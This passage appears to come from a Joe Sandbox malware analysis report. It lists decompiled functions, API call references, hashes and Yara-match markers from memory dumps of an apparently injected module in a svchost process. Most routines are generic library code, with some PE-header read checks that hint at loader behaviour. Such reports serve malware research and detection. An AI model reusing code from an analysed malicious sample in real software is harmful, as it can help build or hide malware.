                                                0x6fd59c0f
                                                0x6fd59c12
                                                0x00000000
                                                0x6fd59c0c
                                                0x00000000
                                                0x6fd59b9c
                                                0x6fd59b7f
                                                0x00000000

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: _free
                                                • String ID:
                                                • API String ID: 269201875-0
                                                • Opcode ID: d475dfe90882afeb51e37ee0ec1fb00756cd7b4daef669e2c6d589908082484b
                                                • Instruction ID: 4ef25dea8936317e0adfee16eaed50700d32aca90520f3ee0153143035727fb8
                                                • Opcode Fuzzy Hash: d475dfe90882afeb51e37ee0ec1fb00756cd7b4daef669e2c6d589908082484b
                                                • Instruction Fuzzy Hash: 0141ADB2A00304DFEF10CFB8C980A6EB7B5EF85324F1546A9E515EB285DB31B911CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 039A2AD3 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free
                                                • String ID:
                                                • API String ID: 269201875-0
                                                • Opcode ID: 3aa9c1b8c533b991c3f137ee3857d868a0494179ed31d7d3044b5632f6205efa
                                                • Instruction ID: a5a71e048cc00596bce8e953fae1918cf3842d41e9506e600b9a419e4a393234
                                                • Opcode Fuzzy Hash: 3aa9c1b8c533b991c3f137ee3857d868a0494179ed31d7d3044b5632f6205efa
                                                • Instruction Fuzzy Hash: EF417136A006049FDB24DF7CC880A6AB7E9EF89754F154AA9D955EF381D631A901CB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03996710 Relevance: 7.6, APIs: 5, Instructions: 82COMMON
                                                Download Yara Rule
                                                APIs
                                                • IsBadHugeReadPtr.KERNEL32(00000000,00000040), ref: 0399672B
                                                • IsBadHugeReadPtr.KERNEL32(00005A4D,000000F8), ref: 03996749
                                                • IsBadHugeReadPtr.KERNEL32(00005A4D,000000F8), ref: 0399675D
                                                • IsBadHugeReadPtr.KERNEL32(00000000,00000040), ref: 0399677E
                                                • IsBadHugeReadPtr.KERNEL32(00000000,000000F8), ref: 039967A0
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: HugeRead
                                                • String ID:
                                                • API String ID: 2080902951-0
                                                • Opcode ID: 31c2a0b37314781ae78c86f758293f355ab14534baa41199d5e5e3c646ab0eb8
                                                • Instruction ID: 69742f97919a0f93e74a236e499f1d18c7b467f30afcc88cacef47f64a5f6acb
                                                • Opcode Fuzzy Hash: 31c2a0b37314781ae78c86f758293f355ab14534baa41199d5e5e3c646ab0eb8
                                                • Instruction Fuzzy Hash: A321D276241B156AFF30DA2C9DC0F6663FCEB41BF5F080567E9409B280FB65E8454AA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 039965A0 Relevance: 7.6, APIs: 5, Instructions: 79COMMON
                                                Download Yara Rule
                                                APIs
                                                • IsBadHugeReadPtr.KERNEL32(00000000,00000040), ref: 039965B7
                                                • IsBadHugeReadPtr.KERNEL32(00005A4D,000000F8), ref: 039965D5
                                                • IsBadHugeReadPtr.KERNEL32(00005A4D,000000F8), ref: 039965E9
                                                • IsBadHugeReadPtr.KERNEL32(00000000,00000040), ref: 0399660A
                                                • IsBadHugeReadPtr.KERNEL32(00000000,000000F8), ref: 0399662C
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: HugeRead
                                                • String ID:
                                                • API String ID: 2080902951-0
                                                • Opcode ID: 869cb38e94b7a87263e3488adbe75c93e17769cd53525f196f093cecd0b5663a
                                                • Instruction ID: 1b23942b63d39ec999ed4cb856d46613b1d3fa943d745db62e8a00f6a638cbbb
                                                • Opcode Fuzzy Hash: 869cb38e94b7a87263e3488adbe75c93e17769cd53525f196f093cecd0b5663a
                                                • Instruction Fuzzy Hash: C111D6723416114AFF30F66E8C80B66E39DEF817F5F084477EA40D7588EF65E4518A64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 6FD54FD0 Relevance: 7.6, APIs: 6, Instructions: 71memoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E6FD54FD0(intOrPtr _a4, void** _a8, long* _a12) {
				void* __edi;
				signed int _t10;
				long _t12;
				void* _t13;
				void** _t20;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr* _t25;
				intOrPtr _t26;

				EnterCriticalSection(0x6fd6ac7c);
				_t23 =  *0x6fd6ac98; // 0x14
				_t10 = 0;
				if(_t23 == 0) {
					L6:
					LeaveCriticalSection(0x6fd6ac7c);
					return 0;
				} else {
					_t24 = _a4;
					_t26 =  *0x6fd6ac94; // 0x304ebb8
					while(1) {
						_t25 = 0;
						if(_t10 < _t23) {
							_t25 =  *((intOrPtr*)(_t26 + _t10 * 4));
						}
						if( *_t25 == _t24) {
							break;
						}
						_t10 = _t10 + 1;
						if(_t10 < _t23) {
							continue;
						} else {
							goto L6;
						}
						goto L12;
					}
					if( *((intOrPtr*)(_t25 + 0x50)) == 0) {
						goto L6;
					} else {
						_t12 =  *(_t25 + 8);
						if(_t12 <= 0) {
							goto L6;
						} else {
							_t27 = _a12;
							 *_a12 = _t12;
							_t13 = LocalAlloc(0x40, _t12);
							_t20 = _a8;
							 *_t20 = _t13;
							E6FD57920(_t25, _t13, 0,  *_t27);
							if(E6FD51000( *_t20, _t27,  *((intOrPtr*)(_t25 + 0x50)),  *((intOrPtr*)(_t25 + 0xc))) == 0) {
								LeaveCriticalSection(0x6fd6ac7c);
								return 1;
							} else {
								LocalFree( *_t20);
								LeaveCriticalSection(0x6fd6ac7c);
								return 0;
							}
						}
					}
				}
				L12:
			}












                                                0x6fd54fda
                                                0x6fd54fe0
                                                0x6fd54fe6
                                                0x6fd54fea
                                                0x6fd55007
                                                0x6fd5500c
                                                0x6fd55017
                                                0x6fd54fec
                                                0x6fd54fec
                                                0x6fd54fef
                                                0x6fd54ff5
                                                0x6fd54ff5
                                                0x6fd54ff9
                                                0x6fd54ffb
                                                0x6fd54ffb
                                                0x6fd55000
                                                0x00000000
                                                0x00000000
                                                0x6fd55002
                                                0x6fd55005
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6fd55005
                                                0x6fd5501e
                                                0x00000000
                                                0x6fd55020
                                                0x6fd55020
                                                0x6fd55025
                                                0x00000000
                                                0x6fd55027
                                                0x6fd55027
                                                0x6fd5502e
                                                0x6fd55030
                                                0x6fd55036
                                                0x6fd55039
                                                0x6fd55040
                                                0x6fd55058
                                                0x6fd5507b
                                                0x6fd55087
                                                0x6fd5505a
                                                0x6fd5505c
                                                0x6fd55067
                                                0x6fd55073
                                                0x6fd55073
                                                0x6fd55058
                                                0x6fd55025
                                                0x6fd5501e
                                                0x00000000

                                                APIs
                                                • EnterCriticalSection.KERNEL32(6FD6AC7C), ref: 6FD54FDA
                                                • LeaveCriticalSection.KERNEL32(6FD6AC7C), ref: 6FD5500C
                                                • LocalAlloc.KERNEL32(00000040,?), ref: 6FD55030
                                                • LocalFree.KERNEL32(?), ref: 6FD5505C
                                                • LeaveCriticalSection.KERNEL32(6FD6AC7C), ref: 6FD55067
                                                • LeaveCriticalSection.KERNEL32(6FD6AC7C), ref: 6FD5507B
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: CriticalSection$Leave$Local$AllocEnterFree
                                                • String ID:
                                                • API String ID: 2684776883-0
                                                • Opcode ID: 98082e2ae2faa10a5804bd9d47fba5757d0e84f5673a614942a818191edd5477
                                                • Instruction ID: 1b728cbf6a419830b28aff2bbc6fe3caaab58d115067ee89e8f71d04ac1c0ff9
                                                • Opcode Fuzzy Hash: 98082e2ae2faa10a5804bd9d47fba5757d0e84f5673a614942a818191edd5477
                                                • Instruction Fuzzy Hash: 1A118136100662EBEF115FA9DC48FAABB64FF5A376F040416F945C6110C731B475EBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03996660 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                Download Yara Rule
                                                APIs
                                                • IsBadHugeReadPtr.KERNEL32(00000000,00000040), ref: 03996677
                                                • IsBadHugeReadPtr.KERNEL32(00005A4D,000000F8), ref: 03996695
                                                • IsBadHugeReadPtr.KERNEL32(00005A4D,000000F8), ref: 039966A9
                                                • IsBadHugeReadPtr.KERNEL32(00000000,00000040), ref: 039966CA
                                                • IsBadHugeReadPtr.KERNEL32(00000000,000000F8), ref: 039966EC
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: HugeRead
                                                • String ID:
                                                • API String ID: 2080902951-0
                                                • Opcode ID: d6bdff7f9520019fa0c360aa6ce0ab0dcb184367659a7f3c097ac16597c49f48
                                                • Instruction ID: b0330943faeaeb28e703c12eda7b6c25572d3f1560de7c3e5d4db630999ac5fb
                                                • Opcode Fuzzy Hash: d6bdff7f9520019fa0c360aa6ce0ab0dcb184367659a7f3c097ac16597c49f48
                                                • Instruction Fuzzy Hash: 5C11A3B1241F1256FF30A96D9C80F66A2AC9F41BF5F180467EB40DA190EF6BD8454A64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 6FD5BC19 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 93%
                                                			E6FD5BC19() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E6FD5BBE2(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t25 = E6FD59FEE(_t19, _t7);
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						E6FD59FB4(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}












                                                0x6fd5bc28
                                                0x6fd5bc2e
                                                0x6fd5bc86
                                                0x6fd5bc86
                                                0x6fd5bc30
                                                0x6fd5bc31
                                                0x6fd5bc36
                                                0x6fd5bc3f
                                                0x6fd5bc45
                                                0x6fd5bc4b
                                                0x6fd5bc50
                                                0x00000000
                                                0x6fd5bc52
                                                0x6fd5bc58
                                                0x6fd5bc5d
                                                0x6fd5bc7b
                                                0x6fd5bc75
                                                0x6fd5bc75
                                                0x6fd5bc77
                                                0x6fd5bc77
                                                0x6fd5bc7e
                                                0x6fd5bc83
                                                0x6fd5bc50
                                                0x6fd5bc8a
                                                0x6fd5bc8d
                                                0x6fd5bc8d
                                                0x6fd5bc9b

                                                APIs
                                                • GetEnvironmentStringsW.KERNEL32 ref: 6FD5BC22
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6FD5BC45
                                                  • Part of subcall function 6FD59FEE: HeapAlloc.KERNEL32(00000000,00000001,00000004,?,6FD5DAC8,00000001,00000000,?,6FD5BCF0,00000001,00000004,00000000,00000001,?,?,6FD59BAA), ref: 6FD5A020
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 6FD5BC6B
                                                • _free.LIBCMT ref: 6FD5BC7E
                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6FD5BC8D
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                • String ID:
                                                • API String ID: 2278895681-0
                                                • Opcode ID: 01d86f1c3f448c76826cf05ad93b0652635ce05ab98fad223375f7768985945a
                                                • Instruction ID: f84257a1294111c937264bc2ec7b8e4e0f44e039f9eaefbd3cbe1ca2f02bae50
                                                • Opcode Fuzzy Hash: 01d86f1c3f448c76826cf05ad93b0652635ce05ab98fad223375f7768985945a
                                                • Instruction Fuzzy Hash: B90171F2601B15BB3F610BBA5D88CBF6A6DDBC3FA47140229F914C2184DF64BC2181B5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 039A9154 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetEnvironmentStringsW.KERNEL32 ref: 039A915D
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 039A9180
                                                  • Part of subcall function 039A4899: RtlAllocateHeap.NTDLL(00000000,039920FE,73B76490), ref: 039A48CB
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 039A91A6
                                                • _free.LIBCMT ref: 039A91B9
                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 039A91C8
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                • String ID:
                                                • API String ID: 336800556-0
                                                • Opcode ID: c4898fa5f7785212cb4ff2139c10d8be0fb940eabb38cb96ce1b0ab89228f7fe
                                                • Instruction ID: f4479c34652943f17fa1c35fa75e893965c44b96e747b17d0ef304e8e291c923
                                                • Opcode Fuzzy Hash: c4898fa5f7785212cb4ff2139c10d8be0fb940eabb38cb96ce1b0ab89228f7fe
                                                • Instruction Fuzzy Hash: 5F018D76A09A197F5B11A6AF6CCCC7BAA6DEAD2DE03150219F905CB245EF608C0195F0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 6FD5B18E Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 81%
                                                			E6FD5B18E(void* __ecx) {
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t15;
				long _t16;

				_t11 = __ecx;
				_t16 = GetLastError();
				_t10 = 0;
				_t2 =  *0x6fd6952c; // 0x7
				_t19 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t15 = E6FD5A03C(_t11, 1, 0x364);
					_pop(_t13);
					if(_t15 != 0) {
						_t4 = E6FD5A57C(_t13, __eflags,  *0x6fd6952c, _t15);
						__eflags = _t4;
						if(_t4 != 0) {
							E6FD5AF50(_t13, _t15, 0x6fd6b568);
							E6FD59FB4(_t10);
							__eflags = _t15;
							if(_t15 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t15);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E6FD59FB4();
						L8:
						SetLastError(_t16);
					}
				} else {
					_t15 = E6FD5A526(_t11, _t19, _t2);
					if(_t15 != 0) {
						L9:
						SetLastError(_t16);
						_t10 = _t15;
					} else {
						goto L2;
					}
				}
				return _t10;
			}










                                                0x6fd5b18e
                                                0x6fd5b199
                                                0x6fd5b19b
                                                0x6fd5b19d
                                                0x6fd5b1a2
                                                0x6fd5b1a5
                                                0x6fd5b1b3
                                                0x6fd5b1bf
                                                0x6fd5b1c2
                                                0x6fd5b1c5
                                                0x6fd5b1d7
                                                0x6fd5b1dc
                                                0x6fd5b1de
                                                0x6fd5b1e9
                                                0x6fd5b1ef
                                                0x6fd5b1f7
                                                0x6fd5b1f9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6fd5b1e0
                                                0x6fd5b1e0
                                                0x00000000
                                                0x6fd5b1e0
                                                0x6fd5b1c7
                                                0x6fd5b1c7
                                                0x6fd5b1c8
                                                0x6fd5b1c8
                                                0x6fd5b1fb
                                                0x6fd5b1fc
                                                0x6fd5b1fc
                                                0x6fd5b1a7
                                                0x6fd5b1ad
                                                0x6fd5b1b1
                                                0x6fd5b204
                                                0x6fd5b205
                                                0x6fd5b20b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6fd5b1b1
                                                0x6fd5b212

                                                APIs
                                                • GetLastError.KERNEL32(?,?,?,6FD5A355,6FD5A08E,?,6FD5B138,00000001,00000364,?,6FD59013,00000104,?,?,?,?), ref: 6FD5B193
                                                • _free.LIBCMT ref: 6FD5B1C8
                                                • _free.LIBCMT ref: 6FD5B1EF
                                                • SetLastError.KERNEL32(00000000,?,?,?,?,00000000,?,6FD556A6,FunctionProtocolHost,?,00000104,FunctionProtocolHost,?,00000104), ref: 6FD5B1FC
                                                • SetLastError.KERNEL32(00000000,?,?,?,?,00000000,?,6FD556A6,FunctionProtocolHost,?,00000104,FunctionProtocolHost,?,00000104), ref: 6FD5B205
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: ErrorLast$_free
                                                • String ID:
                                                • API String ID: 3170660625-0
                                                • Opcode ID: 6f706e58505e4c300866a9f7afef7de4039a3a5b881888b9fa4f80999e7fc330
                                                • Instruction ID: 90a61c67adc33a3314d5da3c5f786bd67c088a5fa641ebfa84c457fc7743dc97
                                                • Opcode Fuzzy Hash: 6f706e58505e4c300866a9f7afef7de4039a3a5b881888b9fa4f80999e7fc330
                                                • Instruction Fuzzy Hash: 1301D17B188B00AB9FC257346E44F2E26399FC77B9B240225F964A22C0EF30F4354671
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 039A5F66 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetLastError.KERNEL32(73B75870,039920FE,73BCF7E0,039A3979,039A48DC,73B76490,?,03997F07,039920FE,?,039920FE,00000010), ref: 039A5F6B
                                                • _free.LIBCMT ref: 039A5FA0
                                                • _free.LIBCMT ref: 039A5FC7
                                                • SetLastError.KERNEL32(00000000,?,039920FE,00000010), ref: 039A5FD4
                                                • SetLastError.KERNEL32(00000000,?,039920FE,00000010), ref: 039A5FDD
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$_free
                                                • String ID:
                                                • API String ID: 3170660625-0
                                                • Opcode ID: d8d90b1f17f9c2f721be3f8c5ed4d3994bc23b37db108a8600ba9061a48b5a60
                                                • Instruction ID: 7d4bf2ff83f9060995160fab14b5cc4dce8c55514825c87bb45745810425d979
                                                • Opcode Fuzzy Hash: d8d90b1f17f9c2f721be3f8c5ed4d3994bc23b37db108a8600ba9061a48b5a60
                                                • Instruction Fuzzy Hash: 9501813A74CF006FD612F66E6C48B2F266DDBC35A57270725F995AA282FA70880141E1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 6FD5D7CB Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E6FD5D7CB(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x6fd69b20; // 0x6fd69b18
					if(_t23 != 0) {
						E6FD59FB4(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x6fd69b24; // 0x6fd6b6f8
					if(_t24 != 0) {
						E6FD59FB4(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x6fd69b28; // 0x6fd6b6f8
					if(_t25 != 0) {
						E6FD59FB4(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x6fd69b50; // 0x6fd69b1c
					if(_t26 != 0) {
						E6FD59FB4(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x6fd69b54; // 0x6fd6b6fc
					if(_t27 != 0) {
						return E6FD59FB4(_t6);
					}
				}
				return _t6;
			}










                                                0x6fd5d7d1
                                                0x6fd5d7d6
                                                0x6fd5d7da
                                                0x6fd5d7e0
                                                0x6fd5d7e3
                                                0x6fd5d7e8
                                                0x6fd5d7ec
                                                0x6fd5d7f2
                                                0x6fd5d7f5
                                                0x6fd5d7fa
                                                0x6fd5d7fe
                                                0x6fd5d804
                                                0x6fd5d807
                                                0x6fd5d80c
                                                0x6fd5d810
                                                0x6fd5d816
                                                0x6fd5d819
                                                0x6fd5d81e
                                                0x6fd5d81f
                                                0x6fd5d822
                                                0x6fd5d828
                                                0x00000000
                                                0x6fd5d830
                                                0x6fd5d828
                                                0x6fd5d833

                                                APIs
                                                • _free.LIBCMT ref: 6FD5D7E3
                                                  • Part of subcall function 6FD59FB4: HeapFree.KERNEL32(00000000,00000000,?,6FD5D862,?,00000000,?,00000000,?,6FD5D889,?,00000007,?,?,6FD5D4FB,?), ref: 6FD59FCA
                                                  • Part of subcall function 6FD59FB4: GetLastError.KERNEL32(?,?,6FD5D862,?,00000000,?,00000000,?,6FD5D889,?,00000007,?,?,6FD5D4FB,?,?), ref: 6FD59FDC
                                                • _free.LIBCMT ref: 6FD5D7F5
                                                • _free.LIBCMT ref: 6FD5D807
                                                • _free.LIBCMT ref: 6FD5D819
                                                • _free.LIBCMT ref: 6FD5D82B
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 90a96edc75a24c3d63b4b0ef137d758792d717004308bbf4c8a60dbbed1ee1b1
                                                • Instruction ID: 856b4d1dfd52f7b79a8077c9ef9c2d2c9d6ec0c56fe0c18fa6dfc1d7773e56a9
                                                • Opcode Fuzzy Hash: 90a96edc75a24c3d63b4b0ef137d758792d717004308bbf4c8a60dbbed1ee1b1
                                                • Instruction Fuzzy Hash: D7F04FB1508708DB8F90CF58E5C4C6AB7DBAB197207680806E518D7748CB30F8A0C6B1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 039AE41B Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • _free.LIBCMT ref: 039AE433
                                                  • Part of subcall function 039A496C: HeapFree.KERNEL32(00000000,00000000,?,039AE6CE,?,00000000,?,00000000,?,039AE972,?,00000007,?,?,039AC3DB,?), ref: 039A4982
                                                  • Part of subcall function 039A496C: GetLastError.KERNEL32(?,?,039AE6CE,?,00000000,?,00000000,?,039AE972,?,00000007,?,?,039AC3DB,?,?), ref: 039A4994
                                                • _free.LIBCMT ref: 039AE445
                                                • _free.LIBCMT ref: 039AE457
                                                • _free.LIBCMT ref: 039AE469
                                                • _free.LIBCMT ref: 039AE47B
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 6976127f0225e2477e803aeead2518674c27d02a63cfec74b9024284ec6f6739
                                                • Instruction ID: 68e48adcefbcf781d8c0d3801fca6c60cfad5ef3d9f405294c7bddcfaee73d9a
                                                • Opcode Fuzzy Hash: 6976127f0225e2477e803aeead2518674c27d02a63cfec74b9024284ec6f6739
                                                • Instruction Fuzzy Hash: 7DF0123691CA10A78624EA9DE481C57F3DDAAC0BD07A84A05F045EF745C770FC908AE4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 6FD59D6F Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 91%
                                                			E6FD59D6F(signed int __ecx) {
				intOrPtr _t7;

				asm("lock xadd [eax], ecx");
				if((__ecx | 0xffffffff) == 0) {
					_t7 =  *0x6fd69b10; // 0x3021d58
					if(_t7 != 0x6fd698f0) {
						E6FD59FB4(_t7);
						 *0x6fd69b10 = 0x6fd698f0;
					}
				}
				E6FD59FB4( *0x6fd6b55c);
				 *0x6fd6b55c = 0;
				E6FD59FB4( *0x6fd6b560);
				 *0x6fd6b560 = 0;
				E6FD59FB4( *0x6fd6b6d0);
				 *0x6fd6b6d0 = 0;
				E6FD59FB4( *0x6fd6b6d4);
				 *0x6fd6b6d4 = 0;
				return 1;
			}




                                                0x6fd59d78
                                                0x6fd59d7c
                                                0x6fd59d7e
                                                0x6fd59d8a
                                                0x6fd59d8d
                                                0x6fd59d93
                                                0x6fd59d93
                                                0x6fd59d8a
                                                0x6fd59d9f
                                                0x6fd59dac
                                                0x6fd59db2
                                                0x6fd59dbd
                                                0x6fd59dc3
                                                0x6fd59dce
                                                0x6fd59dd4
                                                0x6fd59ddc
                                                0x6fd59de5

                                                APIs
                                                • _free.LIBCMT ref: 6FD59D8D
                                                  • Part of subcall function 6FD59FB4: HeapFree.KERNEL32(00000000,00000000,?,6FD5D862,?,00000000,?,00000000,?,6FD5D889,?,00000007,?,?,6FD5D4FB,?), ref: 6FD59FCA
